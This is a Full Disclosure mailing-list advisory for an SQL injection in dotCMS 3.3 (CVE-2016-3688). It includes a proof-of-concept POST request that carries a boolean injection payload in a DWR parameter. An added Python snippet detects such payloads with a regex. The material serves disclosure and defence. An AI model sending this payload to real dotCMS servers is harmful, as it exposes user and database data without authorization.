List: full-disclosure
Subject: [FD] DotCMS injection Vulnerability
From: "p0x2015" <573031544 () qq ! com>
Date: 2016-03-31 13:13:15
Message-ID: tencent_5C7FBBAC00F6CF254FA01FBD () qq ! com
Hello, please add the following to the security mailing lists.
1. Description
Exploit Title: SQL Injection Vulnerability in DotCms v3.3
Date: 3-28-2016
Vendor Homepage: http://dotcms.com/
Vendor: dotcms
Software: Content Management System
Version: v3.3
CVE: CVE-2016-3688
2. Product Summary
================
dotCMS is a fully featured, open source, enterprise-grade J2EE/Java based web content management system for building and managing websites, content and content-driven web applications. It is specially designed to bridge the gap between PHP CMSs and J2EE document management solutions. It includes features such as support for virtual hosting, WebDAV (beta), structured content and clustering, and it can run on multiple databases: PostgreSQL, MySQL, MSSQL and Oracle. It also includes standard WCMS features like page caching, templating, and an API.
3. Vulnerabilities
================
A SQL injection vulnerability has been identified in dotCMS 3.3 which, if successfully exploited, could allow an attacker to access sensitive information in the dotCMS database.
Demo: http://dotcms.com/content-management-system/cms-demo
The vulnerability is in the "c0-e3" parameter of the dwr/call/plaincall/UserAjax.getUsersList.dwr endpoint; in the request below, c0-e3 is the value referenced by the query field of the c0-param2 object passed to getUsersList.
Proof of concept
================
POST /dwr/call/plaincall/UserAjax.getUsersList.dwr
callCount=1
windowName=c0-param2
c0-scriptName=UserAjax
c0-methodName=getUsersList
c0-id=0
c0-param0=null:null
c0-param1=null:null
c0-e1=number:0
c0-e2=number:50
c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'
c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}
batchId=4
instanceId=0
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1459154302419
scriptSessionId=jnMOli*Civ5bu2PIg2Z1YaOlYel/10irYel-hmv1Q$Yud
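As an added example (not part of the advisory), a small Python detector for request bodies of the form shown above: it parses the DWR plaincall fields, follows the `reference:` entries of the `c0-param2` object to the method argument they feed, URL-decodes `string:` values and flags a quote-terminated boolean clause. The regex, the trimmed request body and the benign sample are assumptions of this example, not a dotCMS signature or dotCMS code.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Heuristic for a quote-terminated boolean clause such as "' and 1=1" (assumption of this example)
SQLI_PATTERN = re.compile(r"""['"]\s*(?:and|or)\s+[\w'"%]+\s*=""", re.IGNORECASE)

def parse_dwr_body(body: str) -> dict:
    """Split a DWR plaincall POST body into key -> raw 'type:value' fields."""
    fields = {}
    for line in body.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep:
            fields[key] = value
    return fields

def decode_dwr_value(raw: str) -> Optional[str]:
    """URL-decode a DWR 'string:' value; other types (number, reference) are ignored."""
    kind, _, value = raw.partition(":")
    return unquote(value) if kind == "string" else None

def resolve_object_param(raw: str, fields: dict) -> dict:
    """Map the keys of an Object_Object param to the raw values its references point at."""
    match = re.fullmatch(r"Object_Object:\{(.*)\}", raw)
    if not match:
        return {}
    resolved = {}
    for item in match.group(1).split(","):
        name, _, ref = item.strip().partition(":")
        resolved[name] = fields.get(ref[len("reference:"):], ref) if ref.startswith("reference:") else ref
    return resolved

def find_sqli_indicators(body: str) -> list:
    """Return (argument, decoded value) pairs whose decoded string matches SQLI_PATTERN."""
    fields = parse_dwr_body(body)
    hits = []
    for key, raw in fields.items():
        # For an object param, report the method argument name (e.g. c0-param2.query) the reference feeds
        candidates = ([(f"{key}.{n}", v) for n, v in resolve_object_param(raw, fields).items()]
                      if raw.startswith("Object_Object:") else [(key, raw)])
        for name, value in candidates:
            decoded = decode_dwr_value(value)
            if decoded is not None and SQLI_PATTERN.search(decoded):
                hits.append((name, decoded))
    return hits

# Constructed sample: the request body from the advisory above, trimmed to the relevant DWR fields
DWR_POC = """c0-methodName=getUsersList
c0-e1=number:0
c0-e2=number:50
c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'
c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}"""
# Constructed benign body: the same call with an ordinary search term that contains an apostrophe
DWR_BENIGN = DWR_POC.replace("%25'%20and%201%3D1%20and%20'%25'%3D'", "O%27Brien")
```

The benign sample shows the check keying on the boolean clause rather than on a bare quote, so a legitimate search term with an apostrophe is not flagged.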
4. Discovered by
================
piaox xiong - xiongyaofu351@pingan.com.cn
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/